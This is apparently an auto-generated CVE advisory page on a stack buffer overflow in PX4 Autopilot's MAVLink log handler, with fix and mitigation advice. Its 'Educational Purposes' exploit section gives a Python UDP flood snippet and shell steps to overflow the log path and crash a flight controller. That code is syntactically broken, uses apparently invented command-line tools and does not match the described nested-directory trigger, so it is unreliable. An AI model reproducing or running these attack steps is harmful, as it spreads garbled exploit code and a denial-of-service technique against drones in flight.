Listen to this Post
CVE-2026-32743 is a stack-based buffer overflow vulnerability affecting PX4 Autopilot, an open-source autopilot stack for drones and unmanned vehicles. Versions 1.17.0-rc2 and below are vulnerable through the MavlinkLogHandler, triggered via MAVLink log request. The LogEntry.filepath buffer is 60 bytes, but the sscanf function parses paths from the log list file with no width specifier, allowing a path longer than 60 characters to overflow the buffer. An attacker with MAVLink link access can trigger this by first creating deeply nested directories via MAVLink FTP, then requesting the log list. The flight controller MAVLink task crashes, losing telemetry and command capability and causing DoS. This issue has been fixed in commit 616b25a280e229c24d5cf12a03dbf248df89c474.
DailyCVE Form:
Platform: PX4 Autopilot
Version: 1.17.0-rc2
Vulnerability: Stack overflow
Severity: Medium
date: 2026-03-18
Prediction: 2026-04-15
What Undercode Say:
curl -s https://rdintel.com/cve/CVE-2026-32743 | grep -A5 "LogEntry.filepath" git clone https://github.com/PX4/PX4-Autopilot.git git checkout 616b25a280e229c24d5cf12a03dbf248df89c474
import socket def exploit_mavlink(target_ip, target_port): payload = b"A" 100 sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(payload, (target_ip, target_port))
Exploit: (Educational Purposes!)
mkdir -p /tmp/mavlink_logs/$(python3 -c "print('A'100)")
mavlink-ftp put /tmp/mavlink_logs/$(python3 -c "print('A'100)") /fs/microsd/log/
mavlink-request-log-list
Protection: from this CVE
Upgrade to PX4 Autopilot version 1.17.0 or later. Restrict MAVLink link access to trusted operators only. Disable MAVLink FTP if not required. Apply the fix commit 616b25a280e229c24d5cf12a03dbf248df89c474.
Impact:
Denial of service. Loss of telemetry and command capability. Flight controller MAVLink task crashes.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

